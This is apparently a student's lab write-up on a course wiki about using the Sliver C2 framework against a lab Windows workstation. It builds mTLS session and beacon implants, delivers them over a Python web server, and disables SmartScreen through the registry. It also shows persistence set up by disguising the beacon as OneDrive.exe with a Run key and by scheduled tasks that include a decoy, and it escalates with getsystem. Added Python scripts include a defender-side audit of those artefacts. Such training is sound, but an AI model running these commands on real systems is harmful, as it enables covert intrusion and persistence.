Sliver C2 ‐ Lab - jacobwilliams100/sec-440 GitHub Wiki

Initial Setup

Initial Kali config


Update the package lists with sudo apt update.

Install Sliver C2 with sudo apt install sliver.

This can take a while.

Task 1 – Working with Sliver

1.1 Starting Sliver

Open a new tab and start the Sliver server with the command sliver-server.

Enter multiplayer mode with multiplayer.

Run jobs to check whether the server is ready. If the multiplayer job is listed, it's ready to go!

Deliverable #1.1 - What is the protocol and port number that the server is running on and can we change it to something different?

The server is listening on TCP port 31337.

The way I found to change the port is a bit involved.

We need to edit /home/champuser/.sliver/configs/server.json and change the port value there to the port that you want.

Then we must edit the client config file /home/champuser/simlab_10.0.5.110.cfg and change its port value to the same port.

Reload the client config with sliver-client import /home/champuser/simlab_10.0.5.110.cfg

Then we need to start the server in daemon mode, which is the only way to get it to load server.json. Daemon mode works differently from running the command normally: it provides no interactive CLI for the server application, and it starts multiplayer as part of startup rather than as a job you launch, because the client is the only way to access the server.

We do this with sliver-server daemon

The command does not return, because the server is now running in the foreground like a service.

Open a new terminal window and start the client with sliver-client

As we can see, it connects on the new port 12345.

I feel like there is probably an easier and more convenient way to do this, but I already spent a long time figuring out how to get this to work, so I am moving on.

https://sliver.sh/docs?name=Multi-player+Mode

https://github.com/BishopFox/sliver/wiki/Daemon-Mode/62760f052edba557b974923b373b67ef2fa3731f
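The two edits above have to agree with each other or the client will not connect. The script below is an added example (not part of this lab and not Sliver's own code) that rewrites the port in both files and checks that they match; after running it you still import the .cfg with sliver-client import and start sliver-server daemon as described. The key names are assumptions taken from Sliver's config layout ("daemon_mode" -> "port" in server.json, "lport" in the operator .cfg); confirm them against your own files. Note that the operator .cfg also carries the operator's certificate, private key and token, so treat it as a credential, not just a settings file.

```python
"""Change the Sliver multiplayer port in both config files and verify they agree.

Added example; not part of the lab or of Sliver. Key names are assumed from
Sliver's config layout: "daemon_mode" -> "port" in server.json and "lport" in
the operator .cfg file. Check them against your own files before relying on this.
"""
import argparse
import copy
import json
from pathlib import Path


def validate_port(port: int) -> int:
    """Reject anything outside the TCP port range."""
    if not isinstance(port, int) or not 1 <= port <= 65535:
        raise ValueError(f"invalid TCP port: {port!r}")
    return port


def set_server_port(server_cfg: dict, port: int) -> dict:
    """Return a copy of server.json's contents with the daemon port changed."""
    cfg = copy.deepcopy(server_cfg)
    cfg.setdefault("daemon_mode", {})["port"] = validate_port(port)  # assumed key path
    return cfg


def set_client_port(client_cfg: dict, port: int) -> dict:
    """Return a copy of the operator config with lport changed."""
    cfg = copy.deepcopy(client_cfg)
    cfg["lport"] = validate_port(port)  # assumed key name
    return cfg


def ports_match(server_cfg: dict, client_cfg: dict) -> bool:
    """True when the server daemon port and the operator's lport agree."""
    return server_cfg.get("daemon_mode", {}).get("port") == client_cfg.get("lport")


def rewrite_configs(server_path: str, client_path: str, port: int) -> bool:
    """Rewrite both files on disk and report whether they now agree."""
    server_file, client_file = Path(server_path), Path(client_path)
    server_cfg = set_server_port(json.loads(server_file.read_text()), port)
    client_cfg = set_client_port(json.loads(client_file.read_text()), port)
    server_file.write_text(json.dumps(server_cfg, indent=2) + "\n")
    client_file.write_text(json.dumps(client_cfg, indent=2) + "\n")
    return ports_match(server_cfg, client_cfg)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Set the Sliver multiplayer port")
    parser.add_argument("server_json")   # e.g. ~/.sliver/configs/server.json
    parser.add_argument("operator_cfg")  # e.g. the simlab_....cfg file from new-operator
    parser.add_argument("port", type=int)
    args = parser.parse_args()
    print("configs agree:", rewrite_configs(args.server_json, args.operator_cfg, args.port))
```

Run it as python3 set_port.py ~/.sliver/configs/server.json /home/champuser/simlab_10.0.5.110.cfg 12345, then re-import the .cfg and start the daemon.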

1.2 New Client

We create a new operator (client) configuration with new-operator -n simlab -l 10.0.5.110 (don't use this IP, add your own)

In a new terminal tab, import the Sliver client configuration with sliver-client import /home/champuser/simlab_....

You should now be able to connect with sliver-client

Check for active sessions with sessions

Task 2 – Creating and Using Implants

Creating Session Implant

Create the profile for the session implant with profiles new --mtls 10.0.5.110 --format exe --os windows --arch amd64 windows-session (make sure you use your own IP address in place of this one)

Now we will create the beacon profile with profiles new beacon --mtls 10.0.5.110 --format exe --seconds 5 --jitter 3 --os windows --arch amd64 windows-beacon

Deliverable 2.1 - Submit a screenshot showing the successful creation of the two profiles mentioned above. Your screenshot should show something similar to what is seen in figure 2.1


2.2 Generating Implants & Starting a Web Server

We use two commands to generate a session and beacon implant:

profiles generate --save ~/Public/imp1.exe windows-session

and

profiles generate --save ~/Public/beacon1.exe windows-beacon


Now open a third terminal, navigate to ~/Public with cd Public, and run the command file imp1.exe beacon1.exe to check the implants we just created (file reports the executable type of each one).

Deliverable 2.2 - Submit a screenshot similar to what is seen in figure 2.5 that shows the type of implants you just created.
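What file is doing here is reading the PE headers of the two implants. The following added example (not part of the lab or of Sliver) does the same check in Python so you can see which header fields produce the "PE32+ executable ... x86-64, for MS Windows" description: the Machine field of the COFF header, the Magic and Subsystem fields of the optional header, and the DLL bit in Characteristics. The build_minimal_pe() helper produces a constructed, header-only image used as sample input; it is not a runnable program.

```python
"""Report what kind of PE image a file is (what `file` shows for imp1.exe and
beacon1.exe). Added example, not part of the lab or of Sliver; the image built
by build_minimal_pe() is constructed test data."""
import struct
import sys

MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C4: "ARM", 0xAA64: "ARM64"}
FORMATS = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000


def pe_info(data: bytes) -> dict:
    """Parse the DOS, COFF and optional headers; raise ValueError if this is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    if len(data) < coff + 20:
        raise ValueError("COFF header truncated")
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 70 or len(data) < opt + opt_size:
        raise ValueError("optional header truncated")
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "format": FORMATS.get(magic, hex(magic)),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll": bool(characteristics & IMAGE_FILE_DLL),
        "sections": nsections,
    }


def build_minimal_pe(machine: int = 0x8664, subsystem: int = 2) -> bytes:
    """Constructed header-only PE32+ image used as sample input (not runnable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    opt_size = 240  # standard PE32+ optional header size including data directories
    # Characteristics: EXECUTABLE_IMAGE (0x0002) | LARGE_ADDRESS_AWARE (0x0020)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)        # Magic: PE32+
    struct.pack_into("<H", opt, 68, subsystem)   # Subsystem: 2 = GUI, 3 = console
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for path in sys.argv[1:] or ["imp1.exe", "beacon1.exe"]:
        with open(path, "rb") as f:
            print(path, pe_info(f.read()))
```

Run it in ~/Public with python3 pe_info.py imp1.exe beacon1.exe; the reported machine and format should match the --arch amd64 and --os windows you gave the profiles.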

Webserver startup

Start up the web server with sudo python3 -m http.server 80 (it serves the directory it is started from).

Test the connection to the server.

2.3 Preparing a Directory for Our Files

Preparing a directory for our files: run sudo mkdir /var/www/html/files to create it

Copy the two executables from ~/Public to /var/www/html/files with sudo cp ~/Public/*.exe /var/www/html/files

Make sure we have the proper permissions on the directory and the files with sudo chmod -R 755 /var/www/html/files/

Task 3 - Interacting with Our Sessions

Back in the client window, see what sessions are available with sessions. There are no sessions so far.

3.1 Activating mTLS Listener

On the server, activate the mTLS listener with mtls

3.2 Downloading and Deploying Our Implants

Now we will test this with the Windows workstation wks01. Use it to connect to your Kali VM.

It didn't work because my Python web server was still running out of my Public folder.

I needed to re-run it from /var/www/html.

It worked!

Download imp1.exe

Your web browser may prevent you from downloading this. If it doesn't work, try it in Firefox.

Then run imp1.exe as administrator. You may get a warning when running it; if so, you may need to temporarily disable real-time protection.

This worked!

Back on the Kali system, open the client window and enter sessions once again.

This is what we are looking for: the session with wks01 has been established!

To interact with this session, enter use [ID]. Sliver assigns a codename to the session.

Try running some commands to see if it can process them as wks01.

Deliverable 3.1 - Submit proof that you have connected to the victim system; this could be by running the "ifconfig" command or anything of your choice (e.g. whoami, ls, etc).

To avoid any issues moving forward, let's disable Windows SmartScreen. This can be done from your Sliver client using the following command:

execute -o REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"

Task 4 – Persistence & Lateral Movement

4.1 Uploading the Beacon Implant

We will upload the beacon implant we created earlier to the wks01 target and disguise it as "OneDrive.exe".

We will use this command:

upload '/var/www/html/files/beacon1.exe' 'C:\Users\Public\OneDrive.exe'

Q&A: Why did we upload the beacon.exe to the C:\Users\Public directory?

We upload beacon.exe to C:\Users\Public so that it is in a directory that is available to all users, meaning it stays active no matter who is logged in, increasing the persistence of the threat. Changing users will not disable the beacon.

4.2 Registry - Autorun

Now we will add autorun for this .exe to the Windows Registry with the following command:

execute -o reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDriveUpdater" /t REG_SZ /F /D "C:\Users\Public\OneDrive.exe"


Deliverable 4.1 - Submit proof that you have both tasks performed successfully.

We log out and log back in.

We see that "OneDrive.exe" has been added to the Users\Public folder.

And we can see that "OneDriveUpdater" has been added to the Run key in the Windows Registry.

4.3 Scheduled Tasks

Using scheduled tasks, we will add another persistence mechanism plus a diversion.

The diversion will be a fake scheduled network task. We will reopen the Sliver shell and run:

execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN PingBing /TR "cmd.exe /c ping -c 10 bing.com"

Now we add a scheduled task to run imp1.exe.

We upload another copy with: upload '/var/www/html/files/imp1.exe' 'C:\Users\Public\Downloads\Checkme.exe'

and schedule it with: execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN CheckMe /TR C:\Users\Public\Downloads\Checkme.exe

Deliverable 4.2 - Submit proof that you have both tasks performed successfully.

In task scheduler on wks01, we can now see the PingBing fake network task we scheduled to distract their technicians

CheckMe is here too, but it is failing due to an unknown file location. I think it's because my command to set it up lacked quote marks around the location. I just fixed it manually here.

Seems to be running properly now
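Seen from the defender's side, everything planted in Task 3 and sections 4.2 and 4.3 leaves artefacts that are easy to enumerate: a Run value whose target lives in C:\Users\Public, a SmartScreenEnabled value set to Off, and scheduled tasks that launch from a user-writable folder or fire every few minutes. The script below is an added example (not part of the lab and not Sliver's own code) that runs that audit over constructed samples mimicking reg query and schtasks /query /fo CSV /v output; the CSV column names are assumed from that format and trimmed to the ones the audit uses, and the SAMPLE_* strings are made up to match this lab's commands. On a real host you would feed it the captured output of those two commands instead.

```python
"""Audit Windows autorun, SmartScreen and scheduled-task data for the persistence
patterns used in this lab. Added example for the defender side; not part of the
lab or of Sliver. SAMPLE_* strings are constructed to mimic `reg query` and
`schtasks /query /fo CSV /v` output (CSV column names assumed, trimmed to the
ones used here)."""
import csv
import io
import re

# Locations any local user can write to. An autorun or task launching from one of
# these is a classic persistence sign; the lab plants its beacon in C:\Users\Public.
USER_WRITABLE_DIRS = ("c:\\users\\public", "\\downloads\\", "\\appdata\\local\\temp\\", "c:\\windows\\temp")
MAX_BENIGN_REPEAT_MINUTES = 5  # tasks repeating this often deserve a closer look

REG_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")
REPEAT = re.compile(r"(\d+)\s*Hour\(s\),\s*(\d+)\s*Minute\(s\)")

# Constructed sample: reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\student\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    OneDriveUpdater    REG_SZ    C:\Users\Public\OneDrive.exe
"""

# Constructed sample: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SAMPLE_EXPLORER_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
    SmartScreenEnabled    REG_SZ    Off
"""

# Constructed sample: schtasks /query /fo CSV /v, reduced to four columns
SAMPLE_TASKS_CSV = r'''"TaskName","Task To Run","Schedule Type","Repeat: Every"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","Weekly","N/A"
"\PingBing","cmd.exe /c ping -c 10 bing.com","One Time Only, Minute","0 Hour(s), 3 Minute(s)"
"\CheckMe","C:\Users\Public\Downloads\Checkme.exe","One Time Only, Minute","0 Hour(s), 3 Minute(s)"
'''


def parse_reg_query(text: str) -> dict:
    """Turn `reg query <key>` output into {value_name: data}."""
    values = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            values[m["name"]] = m["data"].strip()
    return values


def from_user_writable_dir(command: str) -> bool:
    """True if the command line references one of the user-writable locations."""
    cmd = command.lower()
    return any(d in cmd for d in USER_WRITABLE_DIRS)


def repeat_minutes(text: str):
    """'0 Hour(s), 3 Minute(s)' -> 3; 'N/A' or anything else -> None."""
    m = REPEAT.search(text)
    return int(m[1]) * 60 + int(m[2]) if m else None


def audit_run_key(values: dict) -> list:
    return [f"Run value '{name}' launches from a user-writable directory: {data}"
            for name, data in values.items() if from_user_writable_dir(data)]


def audit_smartscreen(values: dict) -> list:
    if values.get("SmartScreenEnabled", "").strip('"').lower() == "off":
        return ["SmartScreenEnabled is Off (SmartScreen disabled for Explorer)"]
    return []


def audit_tasks(csv_text: str) -> list:
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name, cmd = row["TaskName"], row["Task To Run"]
        if from_user_writable_dir(cmd):
            findings.append(f"Task {name} runs a binary from a user-writable directory: {cmd}")
        every = repeat_minutes(row["Repeat: Every"])
        if every is not None and every <= MAX_BENIGN_REPEAT_MINUTES:
            findings.append(f"Task {name} repeats every {every} min: {cmd}")
    return findings


def audit_all(run_text=SAMPLE_RUN_KEY, explorer_text=SAMPLE_EXPLORER_KEY, tasks_csv=SAMPLE_TASKS_CSV) -> list:
    """Run all three checks and return the combined findings."""
    return (audit_run_key(parse_reg_query(run_text))
            + audit_smartscreen(parse_reg_query(explorer_text))
            + audit_tasks(tasks_csv))


if __name__ == "__main__":
    for finding in audit_all():
        print("-", finding)
```

On the samples it reports five findings: the OneDriveUpdater Run value, SmartScreen being Off, CheckMe launching from Downloads, and both PingBing and CheckMe repeating every 3 minutes, while the built-in defrag task stays quiet. The decoy task is flagged by frequency alone, which is the point: a diversion that looks like network housekeeping still stands out once you look at how often it runs rather than at its name.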

4.4 Getting SYSTEM

We elevate our privileges to SYSTEM with getsystem

NOTE: I needed to unjoin wks01 from the domain and repeat several of the above steps to get this to work!

This should give us access to a new system session, switch to it


We're in!

Deliverable 4.3 - Submit proof that you have obtained SYSTEM on your Windows system.


Reflection

This was probably my favorite lab yet. Until this point, we have been playing defense, learning about different ways to harden systems and respond to threats. This time, we got to play the attacker and learn how a basic persistent threat operates. We briefly learned about persistent threats from the SolarWinds discussion board assignment during the second week of class, and I was hoping we would get to demo this type of situation. I would have appreciated a bit more guidance on deliverable 1.1, specifically the part about getting sliver-server to run on a different port. It took me a long time to figure out a way to do this, and I feel like there is probably an easier way than the one I found. Also, the third command of part 4.3 did not work properly the first time I did it because the file directory is not in quotations, so it did not include the /'s properly. The one other issue I had was that "getsystem" kept failing, and I think that had to do with the PC still being part of Active Directory. I left the domain, re-did some of the commands that were undone by this, and then it worked. Overall, I thought this was a great lab, and I am looking forward to moving on to the second part.